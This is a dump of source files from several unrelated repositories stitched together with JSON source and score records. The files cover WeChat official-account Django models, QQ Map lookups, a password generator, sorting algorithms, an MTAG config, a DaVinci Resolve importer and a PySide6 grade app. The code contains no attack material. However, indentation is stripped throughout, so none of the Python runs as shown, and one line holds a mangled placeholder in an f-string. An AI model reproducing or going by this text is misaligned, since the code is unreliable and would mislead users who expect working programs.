# acc_token = self.app.refresh_access_token()
# request_url = f'http://api.weixin.qq.com/sns/userinfo?access_token={acc_token}&openid={self.open_id}&lang=zh_CN'
# a = http.request('GET', request_url).data.decode('utf-8')
# b = json.loads(a)
a = requests.get(request_url)
a.encoding = 'utf-8'
b = a.json()
print(b)
errcode = b.get('errcode', 0)
if errcode == 0:
self.nickname = b['nickname']
self.remark = b['remark']
self.subscribe_scene = b['subscribe_scene']
self.sex = int(b['sex'])
self.tagid_list = b['tagid_list']
self.subscribe = b['subscribe']
self.user_info = b
self.save()
return True, errcode
elif errcode == errcode_access_token_expired:
if self.app.refresh_access_token():
return False, errstring_access_token_expired
else:
return False, errstring_access_token_refresh_failed
else:
errcode = 0 - int(b['errcode'])
return False, errcode
def get_nearby_poi(self):
if self.cur_longitude is None or self.cur_latitude is None:
return False, '未能获取用户位置信息'
elif len(self.poi_keyword) == 0:
return False, '未设置搜索关键词'
elif self.poi_dist < 10:
return False, '搜索范围小与10米最低要求,请重新设置'
my_map = QqMap.objects.all()[0]
result, ret_obj = my_map.search_places(longitude=self.cur_longitude, latitude=self.cur_latitude,
dist=self.poi_dist, keyword=self.poi_keyword)
if result:
poi_list = ret_obj
self.cur_location += str(poi_list)
self.save()
return result, poi_list
else:
errmsg = ret_obj
return result, errmsg
def get_location_address(self):
if self.cur_longitude is None or self.cur_latitude is None:
return False, '未能获取用户位置信息'
my_map = QqMap.objects.all()[0]
result, ret_obj = my_map.get_place_name(longitude=self.cur_longitude, latitude=self.cur_latitude)
if result:
self.cur_location = ret_obj
self.save()
return result, ret_obj
else:
errmsg = ret_obj
return result, errmsg
def hash_with_game(self, cur_game_name, len=8):
temp_string = (self.open_id + cur_game_name).encode('utf-8')
return sha1(temp_string).hexdigest()[0-len:]
class AppKeyword(models.Model):
app = models.ForeignKey(WechatApp, on_delete=models.CASCADE, null=True)
keyword = models.CharField(max_length=100, null=True)
content_type_choice = [('文字', '文字'), ('视频', '视频'), ('图片', '图片')]
content_type = models.CharField(max_length=100, choices=content_type_choice, default='文字')
content_data = models.TextField(max_length=1000, default='')
def reply_msg(self, toUser, fromUser):
if self.content_type in ['文字', 'TEXT']:
text_content = self.content_data.replace('<br>', '\n').strip()
replyMsg = reply.TextMsg(toUser, fromUser, text_content)
elif self.content_type in ['图片', 'PIC']:
my_media = WechatMedia.objects.filter(app=self.app, name=self.content_data)
if len(my_media) > 0:
# 如果有重名的图片,就发第一张
mediaId = my_media[0].media_id
replyMsg = reply.ImageMsg(toUser, fromUser, mediaId)
else:
text_content = f'找不到对应的图片{self.content_data},请联系管理员'
replyMsg = reply.TextMsg(toUser, fromUser, text_content)
elif self.content_type in ['视频', 'VIDEO']:
my_media = WechatMedia.objects.filter(app=self.app, name=self.content_data)
if len(my_media) > 0:
# 如果有重名的视频,就发第一个
mediaId = my_media[0].media_id
replyMsg = reply.VideoMsg(toUser, fromUser, mediaId, self.content_data, '')
else:
text_content = f'找不到对应的视频{self.content_data},请联系管理员'
replyMsg = reply.TextMsg(toUser, fromUser, text_content)
else:
text_content = f'app关键词的内容类型{self.content_type}错误,请联系管理员'
replyMsg = reply.TextMsg(toUser, fromUser, text_content)
return replyMsg
class ErrorAutoReply(models.Model):
"""
玩家答错自动回复对象
"""
reply_type_choice = [('TEXT', '文字'), ('PIC', '图片')]
reply_type = models.CharField(max_length=10, default='文字', choices=reply_type_choice)
reply_content = models.TextField(default=error_reply_default)
is_active = models.BooleanField(default=True)
def __str__(self):
return self.reply_content
def reply_msg(self, toUser, fromUser='', for_text=True):
content_type = self.reply_type
content_data = self.reply_content
if content_type == 'TEXT':
text_content = content_data.replace('<br>', '\n').strip()
if for_text:
text_content = replace_content_with_hyperlink(text_content)
replyMsg = reply.TextMsg(toUser, fromUser, text_content)
else:
ret_content = text_content
elif content_type == 'PIC':
my_media = WechatMedia.objects.filter(app=self.game.app, name=content_data)
if len(my_media) > 0:
# 如果有重名的图片,就发第一张
mediaId = my_media[0].media_id
if for_text:
replyMsg = reply.ImageMsg(toUser, fromUser, mediaId)
else:
# return the image url
ret_content = my_media[0].info.get('url', '')
else:
text_content = f'找不到对应的图片{content_data},请联系管理员'
replyMsg = reply.TextMsg(toUser, fromUser, text_content)
ret_content = text_content
else:
text_content = f'答错自动回复内容{content_type}错误,请联系管理员'
replyMsg = reply.TextMsg(toUser, fromUser, text_content)
ret_content = text_content
if for_text:
return replyMsg
else:
return ret_content
class WechatMenu(models.Model):
"""
公众号自定义菜单
"""
app = models.ForeignKey(WechatApp, on_delete=models.CASCADE, null=True, blank=True)
menu_string = models.JSONField(null=True, blank=True)
remark = models.CharField(max_length=100, default='', blank=True)
MatchRule = models.BooleanField(default=False)
match_tag_id = models.CharField(max_length=100, default='', blank=True)
def __str__(self):
return self.remark
def save(self):
result, ret_obj = self.gen_menu_json()
if result:
super(WechatMenu, self).save()
return True, 'OK'
else:
return False, ret_obj
def gen_menu_json(self):
buttons = MenuButton.objects.filter(menu=self)
json_dict = dict()
json_dict['button'] = list()
for button in buttons:
result, ret_obj = button.gen_json_dict()
if result:
json_dict['button'].append(ret_obj)
else:
return False, ret_obj
if self.MatchRule:
if len(self.match_tag_id) > 0:
json_dict['matchrule'] = {'tag_id': self.match_tag_id}
self.menu_string = json_dict
return True, 'OK'
def submit_menu(self):
acc_token = self.app.acc_token
# http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
# request_url = f'https://api.weixin.qq.com/cgi-bin/menu/create?access_token={acc_token}'
request_url = f'http://api.weixin.qq.com/cgi-bin/menu/create'
try:
pass
# my_menu = json.loads(self.menu_string, encoding='utf-8')
except:
return False, 'menu_string is not valid'
else:
# a = http.request('POST', request_url, body=json.dumps(self.menu_string, ensure_ascii=False).encode('utf-8'),
# encode_multipart=False).data.decode('utf-8')
# b = json.loads(a)
a = requests.post(request_url, data=json.dumps(self.menu_string, ensure_ascii=False).encode('utf-8'))
a.encoding = 'utf-8'
b = a.json()
errcode = b.get('errcode', 0)
errmsg = b.get('errmsg', 'OK')
if errcode == 0:
return True, errmsg
elif errcode == errcode_access_token_expired:
if self.app.refresh_access_token():
return False, errstring_access_token_expired
else:
return False, errstring_access_token_refresh_failed
else:
# 如果成功获取信息,就直接返回json文件
return False, errmsg
class MenuButton(models.Model):
menu = models.ForeignKey(WechatMenu, on_delete=models.CASCADE, null=True)
name = models.CharField('菜单标题', max_length=120, default='')
type_choice = [('sub_button', '二级菜单'), ('click', '按钮'), ('view', '链接'), ('scancode_waitmsg', '扫码带提示'),
('scancode_push', '扫码推事件'), ('pic_sysphoto', '系统拍照发图'),
('pic_photo_or_album', '拍照或者相册发图'),
('pic_weixin', '微信相册发图'), ('location_select', '选择位置'),
('media_id', '图文消息'), ('view_limited', '图文消息(限制)'),
('article_id', '发布后的图文消息'), ('article_view_limited', '发布后的图文消息(限制)')]
type = models.CharField(max_length=100, default='click', choices=type_choice)
key = models.CharField(max_length=100, default='', blank=True)
url = models.TextField(max_length=1000, default='', blank=True)
media_id = models.CharField(max_length=100, default='', blank=True)
app_id = models.CharField('小程序id', max_length=300, default='', blank=True)
pagepath = models.CharField('小程序页面路径', max_length=300, default='', blank=True)
article_id = models.CharField(max_length=100, default='', blank=True)
sub_button = models.JSONField(null=True, blank=True)
def __str__(self):
return f'{self.menu.remark} {self.name}'
def gen_json_dict(self):
ret_dict = dict()
if len(self.name) == 0:
return False, 'name is blank'
else:
ret_dict['name'] = self.name
if self.type == 'sub_button':
sub_buttons = MenuSubButton.objects.filter(parent_button=self)
if len(sub_buttons) > 0:
# check sub buttons
ret_dict['sub_button'] = list()
for sub_button in sub_buttons:
result, ret_obj = sub_button.gen_json_dict()
if result:
ret_dict['sub_button'].append(ret_obj)
else:
return False, ret_obj
self.sub_button = ret_dict
self.save()
elif self.type in ['view']:
if len(self.url) == 0:
return False, 'url is blank while type=view'
else:
ret_dict['url'] = self.url
ret_dict['type'] = self.type
elif self.type in ['click', 'location_select']:
if len(self.key) == 0:
return False, f'key is blank in {self.name}'
else:
ret_dict['key'] = self.key
ret_dict['type'] = self.type
return True, ret_dict
class MenuSubButton(models.Model):
parent_button = models.ForeignKey(MenuButton, on_delete=models.DO_NOTHING, null=True)
name = models.CharField('菜单标题', max_length=120, default='')
type_choice = [('click', '按钮'), ('view', '链接'), ('scancode_waitmsg', '扫码带提示'),
('scancode_push', '扫码推事件'), ('pic_sysphoto', '系统拍照发图'),
('pic_photo_or_album', '拍照或者相册发图'),
('pic_weixin', '微信相册发图'), ('location_select', '选择位置'),
('media_id', '图文消息'), ('view_limited', '图文消息(限制)'),
('article_id', '发布后的图文消息'), ('article_view_limited', '发布后的图文消息(限制)')]
type = models.CharField(max_length=100, default='click', choices=type_choice)
key = models.CharField(max_length=100, default='', blank=True)
url = models.TextField(max_length=1000, default='', blank=True)
media_id = models.CharField(max_length=100, default='', blank=True)
app_id = models.CharField('小程序id', max_length=300, default='', blank=True)
pagepath = models.CharField('小程序页面路径', max_length=300, default='', blank=True)
article_id = models.CharField(max_length=100, default='', blank=True)
def __str__(self):
return f'{self.parent_button.name} {self.name}'
def gen_json_dict(self):
ret_dict = dict()
if len(self.name) == 0:
return False, 'name is blank'
else:
ret_dict['name'] = self.name
if self.type in ['click', 'location_select']:
if len(self.key) == 0:
return False, 'key is blank while type=click'
else:
ret_dict['key'] = self.key
ret_dict['type'] = self.type
elif self.type in ['view']:
if len(self.url) == 0:
return False, 'url is blank while type=view'
else:
ret_dict['url'] = self.url
ret_dict['type'] = self.type
else:
pass
return True, ret_dict
class QqMap(models.Model):
name = models.CharField(max_length=100, default='', blank=True)
key = models.CharField(max_length=100, default='', blank=True)
def __str__(self):
return self.name
def search_places(self, longitude, latitude, dist, keyword):
longitude, latitude = wgs84_to_gcj02(longitude, latitude)
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
request_url = 'https://apis.map.qq.com/ws/place/v1/search?'
request_url += f'boundary=nearby({latitude},{longitude},{dist},0)'
request_url += f'&key={self.key}&keyword={keyword}'
a = http.request('GET', request_url).data.decode('utf-8')
b = json.loads(a)
status = b.get('status', -1)
ret_list = list()
if status == 0:
POIs = b.get('data', list())
for poi_dict in POIs:
poi_title = poi_dict.get('title', '')
if len(poi_title) > 0:
ret_list.append(poi_title)
return True, ret_list
else:
message = b.get('message', '')
return False, message
def get_place_name(self, longitude, latitude):
longitude, latitude = wgs84_to_gcj02(longitude, latitude)
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
request_url = f'https://apis.map.qq.com/ws/geocoder/v1/?location={latitude},{longitude}&key={self.key}'
a = http.request('GET', request_url).data.decode('utf-8')
b = json.loads(a)
status = b.get('status', -1)
if status == 0:
result = b.get('result', dict())
address = result.get('address', '')
recommend = result.get('formatted_addresses', dict()).get('recommend', '')
return True, f'{address} {recommend}'
else:
message = b.get('message', '')
return False, message
```
#### File: wechat/wxcloudrun/user_manage.py
```python
from random import sample
import csv
def gen_passwd(initial='0', length=7, use_symbol=False, use_lower=True, use_number=False, use_upper=True):
"""
密码生成器
:param initial: 以什么字符开头,方便区分不同用途的密码
:param length:
:param use_symbol:
:param use_lower:
:param use_number:
:param use_upper:
:return:
"""
password_list = list()
symbol_list = ['!', '@', '#', '$', '%', '^', '&', '*', '(', ')', '_', '+', '-', '=']
number_list = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
upper_list = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T',
'U', 'V', 'W', 'X', 'Y', 'Z']
lower_list = ['z', 'y', 'x', 'w', 'v', 'u', 't', 's', 'r', 'q', 'p', 'o', 'n', 'm', 'l', 'k', 'j', 'i', 'h', 'g',
'f', 'e', 'd', 'c', 'b', 'a']
if use_lower:
password_list.extend(lower_list)
if use_upper:
password_list.extend(upper_list)
if use_number:
password_list.extend(number_list)
if use_symbol:
password_list.extend(symbol_list)
if len(password_list) > 0 and length > 0:
password = initial
password += ''.join(sample(password_list, length)).replace(' ', '')
return password
else:
return False
def save_passwd_to_csv(account_passwd_dict):
# allowed_usesr_list_file = f'../data/user_list_new.csv'
with open(allowed_usesr_list_file, 'w') as f:
for password, account in account_passwd_dict.items():
f.writelines(f'{account},{password}\n')
def load_passwd_from_csv():
account_passwd_dict = dict()
with open(allowed_usesr_list_file, 'r') as f:
passwd_data = csv.reader(f)
for (account, password) in passwd_data:
account_passwd_dict[password] = account
return account_passwd_dict
if __name__ == '__main__':
account_passwd_dict = load_passwd_from_csv()
for i in range(1000):
new_passwd = gen_passwd(4)
if new_passwd not in account_passwd_dict.keys():
account_passwd_dict[new_passwd] = f'账号{<PASSWORD>}'
else:
i -= 1
save_passwd_to_csv(account_passwd_dict)
```
|
{
"source": "jedxops/sorting",
"score": 3
}
|
#### File: jedxops/sorting/insertion_sort.py
```python
import sys
import random
import time
# insertion sorting algorithm
# taken from D. LeBlanche's slides: http://web.cecs.pdx.edu/~dleblanc/cs350/sorting.pdf
# also an inspiration of: https://github.com/aligoren/pyalgo/blob/master/insertionSort.py
# credit to that github user (LICENSE at the bottom of this file)
def insertion_sort(A):
for j in range(1, len(A)):
key = A[j]
i = j
while i > 0 and A[i - 1] > key:
A[i] = A[i - 1]
i = i - 1
A[i] = key
return A
# generate list
def gen_list(size):
random.seed()
# n = random.randint(0, size)
liss = []
i = 0
while i < size:
liss.append(random.randint(0, 100)) # fill the list with values from zero to 100
i = i + 1
return liss
def main():
if len(sys.argv) < 1:
print("Error. Not enough arguments")
return
size = int(sys.argv[1])
ticks1 = time.time()
list = gen_list(size)
ticks2 = time.time()
# formatting idea came from: https://stackoverflow.com/questions/8595973/truncate-to-three-decimals-in-python
print("Total time to generate list in seconds: " + str('%.3f'%(ticks2 - ticks1)) + '.')
ticks1 = time.time()
sorted = insertion_sort(list)
ticks2 = time.time()
print("Total insertion sort time taken in seconds: " + str('%.3f'%(ticks2 - ticks1)) + '.')
# print("Sorted: ")
# print(sorted)
return
if __name__ == '__main__':
main()
'''
The MIT License (MIT)
Copyright (c) 2015 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
'''
```
#### File: jedxops/sorting/merge_sort.py
```python
import sys
import random
import time
import math
# merge sort algorithm
# taken from D. LeBlanche's slides: http://web.cecs.pdx.edu/~dleblanc/cs350/sorting.pdf
def merge_sort(A):
if len(A) == 0:
return []
if len(A) == 1:
return A
mid = math.floor(len(A) // 2)
B = []
C = []
#for i in range(mid - 1): #these were making my code run infinitely.
#B.append(A[i]) #slice operators saved the day!
B = merge_sort(A[:mid])
#for i in range(mid, len(A) - 1):
# C.append(A[i])
C = merge_sort(A[mid:])
return merge_lists(B, C)
# merge two lists
# taken from D. LeBlanche's slides: http://web.cecs.pdx.edu/~dleblanc/cs350/sorting.pdf
def merge_lists(B, C):
i = 0
j = 0
A = []
while i < len(B) and j < len(C):
if B[i] <= C[j]:
A.append(B[i])
i = i + 1
else:
A.append(C[j])
j = j + 1
if i == len(B):
Z = []
for i in range(j, len(C)):
Z.append(C[i])
A = A + Z
else:
Z = []
for k in range(i, len(B)):
Z.append(B[k])
A = A + Z
return A
# generate list
def gen_list(size):
random.seed()
# n = random.randint(0, size)
liss = []
i = 0
while i < size:
liss.append(random.randint(0, 100)) # fill the list with values from zero to 100
i = i + 1
return liss
def main():
if len(sys.argv) < 1:
print("Error. Not enough arguments")
return
size = int(sys.argv[1])
ticks1 = time.time()
list = gen_list(size)
ticks2 = time.time()
# formatting idea came from: https://stackoverflow.com/questions/8595973/truncate-to-three-decimals-in-python
print("Total time to generate list in seconds: " + str('%.3f'%(ticks2 - ticks1)) + '.')
ticks1 = time.time()
list = merge_sort(list)
ticks2 = time.time()
print("Total merge sort time taken in seconds: " + str('%.3f'%(ticks2 - ticks1)) + '.')
#print("sorted")
#print(list)
return
if __name__ == '__main__':
main()
```
|
{
"source": "jedyang97/MTAG",
"score": 2
}
|
#### File: jedyang97/MTAG/consts.py
```python
from best_metrics import Best
class GlobalConsts:
single_gpu = True
load_model = False
save_grad = False
dataset = "mosi"
data_path = "/workspace/dataset/"
log_path = None
padding_len = -1
include_zero = True
# cellDim = 150
# normDim = 100
# hiddenDim = 300
config = {
"seed": 0,
"batch_size": 2,
"epoch_num": 50,
"cuda": 0,
"global_lr": 1e-4,
"gru_lr": 1e-4,
"beta1": 0.9,
"beta2": 0.999,
"eps": 1e-8,
'weight_decay': 1e-2,
'momentum': 0.9,
"gnn_dropout": 0.1,
"num_modality": 3,
"num_frames": 50,
"temporal_connectivity_order": 5,
"num_vision_aggr": 1,
"num_text_aggr": 1,
"num_audio_aggr": 1,
"text_dim": 300,
"audio_dim": 5,
"vision_dim": 20,
"graph_conv_in_dim": 512,
"graph_conv_out_dim": 512,
"gat_conv_num_heads": 4,
"transformer_nhead": 4,
"transformer_nhid": 1024,
"transformer_nlayers": 6,
}
device = None
best = Best()
def logParameters(self):
print( "Hyperparameters:")
for name in dir(GlobalConsts):
if name.find("__") == -1 and name.find("max") == -1 and name.find("min") == -1:
print( "\t%s: %s" % (name, str(getattr(GlobalConsts, name))))
```
|
{
"source": "jedybg/resolve-advanced-importer",
"score": 2
}
|
#### File: jedybg/resolve-advanced-importer/init.py
```python
import base64
import tkinter as tk
from PIL import ImageTk, Image
from icon import icon
mainWindow = tk.Tk()
def InitializeTkWindow():
mainWindow.title("DaVinci Resolve Advanced Importer")
mainWindow.resizable(False, False)
mainWindow.call('wm', 'iconphoto', mainWindow._w, ImageTk.PhotoImage(data=base64.b64decode(icon)))
```
#### File: jedybg/resolve-advanced-importer/resolveImporter.py
```python
import os
import threading
import config as c
from resolve import (mediaPool)
from time import sleep
from tkinter.messagebox import showerror
from resolveBinTree import ResolveBinTree
class ResolveImporter(threading.Thread):
IMPORTED_MESSAGE_DURATION = 0.7
importerThread = None
def __init__(self, directory) -> None:
super().__init__()
self._stop = threading.Event()
self.directory = directory
def stop(self):
self._stop.set()
def stopped(self):
return self._stop.isSet()
def run(self):
while True:
sleepDuration = c.sleepBetweenChecks - self.IMPORTED_MESSAGE_DURATION
if not self.updateMessage("Importing"): return
sleep(sleepDuration/3)
if not self.updateMessage("Importing."): return
sleep(sleepDuration/3)
if not self.updateMessage("Importing.."): return
sleep(sleepDuration/3)
if not self.updateMessage("Importing..."): return
self.importDir()
if c.timelinesBin or c.compoundClipsBin or c.fusionCompsBin:
master = ResolveBinTree.get()
if c.timelinesBin:
timelines = master.getTimelines()
timelinesToMove = []
for timeline in timelines:
if not c.timelinesBin.hasClip(timeline):
timelinesToMove.append(timeline)
if len(timelinesToMove) > 0:
c.timelinesBin.moveClipsToBin(timelinesToMove)
print(f"[Resolve Importer] Moved {[t.GetClipProperty('Clip Name') for t in timelinesToMove]} timelines to {c.timelinesBin.getPath()}")
if c.compoundClipsBin:
compoundClips = master.getCompoundClips()
compoundClipsToMove = []
for clip in compoundClips:
if not c.compoundClipsBin.hasClip(clip):
compoundClipsToMove.append(clip)
if len(compoundClipsToMove) > 0:
c.compoundClipsBin.moveClipsToBin(compoundClipsToMove)
print(f"[Resolve Importer] Moved {[c.GetClipProperty('Clip Name') for c in compoundClipsToMove]} compound clips to {c.compoundClipsBin.getPath()}")
if c.fusionCompsBin:
fusionComps = master.getFusionComps()
fusionCompsToMove = []
for clip in fusionComps:
if not c.fusionCompsBin.hasClip(clip):
fusionCompsToMove.append(clip)
if len(fusionCompsToMove) > 0:
c.fusionCompsBin.moveClipsToBin(fusionCompsToMove)
print(f"[Resolve Importer] Moved {[c.GetClipProperty('Clip Name') for c in fusionComps]} fusion comps to {c.fusionCompsBin.getPath()}")
master.refresh()
if not self.updateMessage("Importing... Finished Import"): return
sleep(self.IMPORTED_MESSAGE_DURATION)
# returns false if stopped
def updateMessage(self, message):
if self.stopped():
c.importedMessage.set("")
return False
c.importedMessage.set(message)
return True
def importDir(self):
print(f"[Resolve Importer] Importing from {self.directory} to {c.importToBin.getPath()}")
c.importToBin.refresh()
c.importToBin.syncBinWithFolder(self.directory, recursive = True)
def toggleImport():
if(ResolveImporter.importerThread):
print(f"[Resolve Importer] Stopping to Import from {c.folderPath.get()} to bin {c.importToBin.getPath()}")
c.importing.set(False)
ResolveImporter.importerThread.stop()
ResolveImporter.importerThread = None
else:
if not ResolveImporter.validateImportPath():
return
c.saveCache()
print(f"[Resolve Importer] Starting to Import from {c.folderPath.get()} to bin {c.importToBin.getPath()}")
c.importing.set(True)
c.importedMessage.set("Importing")
ResolveImporter.importerThread = ResolveImporter(c.folderPath.get())
ResolveImporter.importerThread.daemon = True
ResolveImporter.importerThread.start()
def validateImportPath():
if not os.path.isdir(c.folderPath.get()):
showerror(title="Error", message="Invalid import path. Please check your path config and try again.")
return False
return True
```
#### File: jedybg/resolve-advanced-importer/resolve.py
```python
import sys
import imp
import os
import json
import config as c
def GetResolve():
scriptModule = None
try:
import fusionscript as scriptModule
except ImportError:
resolvePath = c.getResolvePath()
# Look for an auto importer config path
if resolvePath:
try:
scriptModule = imp.load_dynamic("fusionscript", resolvePath)
except ImportError:
print("[Resolve Importer] Failed to load resolve at config path: " + resolvePath)
pass
if not scriptModule:
# Look for installer based environment variables:
libPath=os.getenv("RESOLVE_SCRIPT_LIB")
if libPath:
try:
scriptModule = imp.load_dynamic("fusionscript", libPath)
except ImportError:
pass
if not scriptModule:
# Look for default install locations:
ext=".so"
if sys.platform.startswith("darwin"):
path = "/Applications/DaVinci Resolve/DaVinci Resolve.app/Contents/Libraries/Fusion/"
elif sys.platform.startswith("win") or sys.platform.startswith("cygwin"):
ext = ".dll"
path = "C:\\Program Files\\Blackmagic Design\\DaVinci Resolve\\"
elif sys.platform.startswith("linux"):
path = "/opt/resolve/libs/Fusion/"
try:
scriptModule = imp.load_dynamic("fusionscript", path + "fusionscript" + ext)
except ImportError:
pass
if scriptModule:
sys.modules["DaVinciResolveScript"] = scriptModule
import DaVinciResolveScript as bmd
else:
raise ImportError("Could not locate module dependencies")
return bmd.scriptapp("Resolve")
resolve = GetResolve()
projectManager = resolve.GetProjectManager()
project = projectManager.GetCurrentProject()
mediaPool = project.GetMediaPool()
mediaStorage = resolve.GetMediaStorage()
```
|
{
"source": "jedymatt/ClassGenie",
"score": 2
}
|
#### File: jedymatt/ClassGenie/app.py
```python
import pandas as pd
import xlwings as xw
from PySide6.QtGui import QIntValidator
from PySide6.QtGui import Qt
from PySide6.QtWidgets import QApplication
from PySide6.QtWidgets import QDialog
from PySide6.QtWidgets import QFileDialog
from PySide6.QtWidgets import QHeaderView
from PySide6.QtWidgets import QItemDelegate
from PySide6.QtWidgets import QLineEdit
from PySide6.QtWidgets import QListWidgetItem
from PySide6.QtWidgets import QMainWindow
from PySide6.QtWidgets import QTableWidgetItem
from qt_material import apply_stylesheet
from class_record import ClassSheet
from class_record import randomizer
from ui.AboutDialog import Ui_AboutDialog
from ui.EditGradesDialog import Ui_EditGradesDialog
from ui.InputGradesDialog import Ui_InputGradesDialog
from ui.MainWindow import Ui_MainWindow
from ui.OptionDialog import Ui_OptionDialog
from version import __version__
RANDOMIZER_MAX_LOOP = 100_000
RANDOMIZER_THRESHOLD = 1.6
class IntDelegate(QItemDelegate):
def createEditor(self, parent, option, index):
editor = QLineEdit(parent)
editor.setValidator(QIntValidator())
return editor
class AboutDialog(QDialog):
def __init__(self, parent):
super().__init__(parent)
self.ui = Ui_AboutDialog()
self.ui.setupUi(self)
self.ui.labelAuthor.setText('jedymatt')
self.ui.versionLabel.setText(__version__)
class EditGradesDialog(QDialog):
def __init__(self, parent, cs):
super().__init__(parent)
self.ui = Ui_EditGradesDialog()
self.ui.setupUi(self)
self.cs = cs
self.ui.pushButton.clicked.connect(self.generate)
def generate(self):
offset_value = self.ui.spinBox.value()
for sr in self.cs.student_records:
expected_average = sr.transmuted_average + offset_value
overwrite_all = self.ui.checkBox.isChecked()
randomizer.randomize_student_record(sr, expected_average, self.cs.head_components,
max_loop=RANDOMIZER_MAX_LOOP,
threshold=RANDOMIZER_THRESHOLD,
overwrite_all=overwrite_all)
# save scores to excel
QApplication.setOverrideCursor(Qt.WaitCursor)
self.cs.save_sheet()
QApplication.restoreOverrideCursor()
self.close()
class InputGradesDialog(QDialog):
def __init__(self, parent, cs: ClassSheet):
super().__init__(parent)
self.ui = Ui_InputGradesDialog()
self.ui.setupUi(self)
self.cs = cs
df = pd.DataFrame([[student.name, ''] for student in self.cs.student_records])
self.df = df
self.ui.tableWidget.setRowCount(df.shape[0])
self.ui.tableWidget.setColumnCount(df.shape[1])
self.ui.checkBox.setChecked(True)
self.ui.tableWidget.setHorizontalHeaderLabels(["Learner's Names", "New Average"])
self.ui.tableWidget.horizontalHeader().setSectionResizeMode(QHeaderView.ResizeToContents)
self.ui.tableWidget.horizontalHeader().setStretchLastSection(True)
self.ui.tableWidget.setItemDelegateForColumn(1, IntDelegate())
for row in range(self.ui.tableWidget.rowCount()):
for col in range(self.ui.tableWidget.columnCount()):
item = QTableWidgetItem(str(self.df.iloc[row, col]))
self.ui.tableWidget.setItem(row, col, item)
self.ui.tableWidget.cellChanged[int, int].connect(self.update_df)
self.ui.pushButton.clicked.connect(self.generate)
def update_df(self, row, column):
text = self.ui.tableWidget.item(row, column).text()
self.df.iloc[row, column] = text
def generate(self):
for row in self.df.iterrows():
row_idx, values = row
if values[1] is not None and values[1] != '':
value = str(self.df.iloc[row_idx, 1])
overwrite_all = bool(self.ui.checkBox.checkState())
randomizer.randomize_student_record(self.cs.student_records[row_idx], int(value),
self.cs.head_components, max_loop=RANDOMIZER_MAX_LOOP,
overwrite_all=overwrite_all, threshold=RANDOMIZER_THRESHOLD)
# save scores to excel
QApplication.setOverrideCursor(Qt.WaitCursor)
self.cs.save_sheet()
QApplication.restoreOverrideCursor()
self.close()
class OptionDialog(QDialog):
def __init__(self, parent, title, cs: ClassSheet):
super().__init__(parent)
self.ui = Ui_OptionDialog()
self.ui.setupUi(self)
self.setWindowTitle(title)
self.cs = cs
self.input_grades = None
self.edit_grades = None
self.ui.buttonNewAverage.clicked.connect(self.create_new_average)
self.ui.buttonExistingAverage.clicked.connect(self.edit_existing_average)
def create_new_average(self):
QApplication.setOverrideCursor(Qt.WaitCursor)
self.input_grades = InputGradesDialog(self, self.cs)
QApplication.restoreOverrideCursor()
self.input_grades.show()
def edit_existing_average(self):
self.edit_grades = EditGradesDialog(self, self.cs)
self.edit_grades.show()
class MainWindow(QMainWindow):
def __init__(self):
super().__init__()
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
self.setWindowTitle('Class Genie')
self.ui.listWidget.hide()
self.ui.pushButton.hide()
self.app = xw.App(visible=False, add_book=False)
self.wb = None
self.cs = None
self.dialog = None
self.about = AboutDialog(self)
self.ui.actionOpen.triggered.connect(self.open_workbook)
self.ui.actionAbout.triggered.connect(lambda: self.about.show())
self.ui.pushButton.clicked.connect(self.edit_selected)
def open_workbook(self):
url = QFileDialog.getOpenFileName(self, filter='Excel Files (*.xlsx)')
if url[0]:
if self.app.books:
print('has active')
self.app.books.active.close()
self.ui.listWidget.clear()
QApplication.setOverrideCursor(Qt.WaitCursor)
self.wb: xw.Book = self.app.books.open(url[0], update_links=False)
QApplication.restoreOverrideCursor()
self.ui.listWidget.show()
self.ui.pushButton.show()
for sheet in self.wb.sheets:
item = QListWidgetItem(sheet.name)
item.setData(1, sheet)
self.ui.listWidget.addItem(sheet.name)
def edit_selected(self):
index: QListWidgetItem = self.ui.listWidget.currentItem()
if index is None:
return
sheet = self.wb.sheets[index.text()]
self.cs = ClassSheet(sheet)
self.dialog = OptionDialog(self, index.text(), self.cs)
self.dialog.show()
def closeEvent(self, event):
self.wb.close()
self.app.quit()
if __name__ == '__main__':
app = QApplication([])
main_window = MainWindow()
main_window.show()
apply_stylesheet(app, 'dark_red.xml')
app.exec()
```
#### File: ClassGenie/ui/AboutDialog.py
```python
from PySide6.QtCore import * # type: ignore
from PySide6.QtGui import * # type: ignore
from PySide6.QtWidgets import * # type: ignore
class Ui_AboutDialog(object):
def setupUi(self, AboutDialog):
if not AboutDialog.objectName():
AboutDialog.setObjectName(u"AboutDialog")
AboutDialog.resize(270, 207)
self.verticalLayout = QVBoxLayout(AboutDialog)
self.verticalLayout.setObjectName(u"verticalLayout")
self.appLabel = QLabel(AboutDialog)
self.appLabel.setObjectName(u"appLabel")
sizePolicy = QSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(1)
sizePolicy.setHeightForWidth(self.appLabel.sizePolicy().hasHeightForWidth())
self.appLabel.setSizePolicy(sizePolicy)
font = QFont()
font.setPointSize(28)
self.appLabel.setFont(font)
self.verticalLayout.addWidget(self.appLabel)
self.versionLabel = QLabel(AboutDialog)
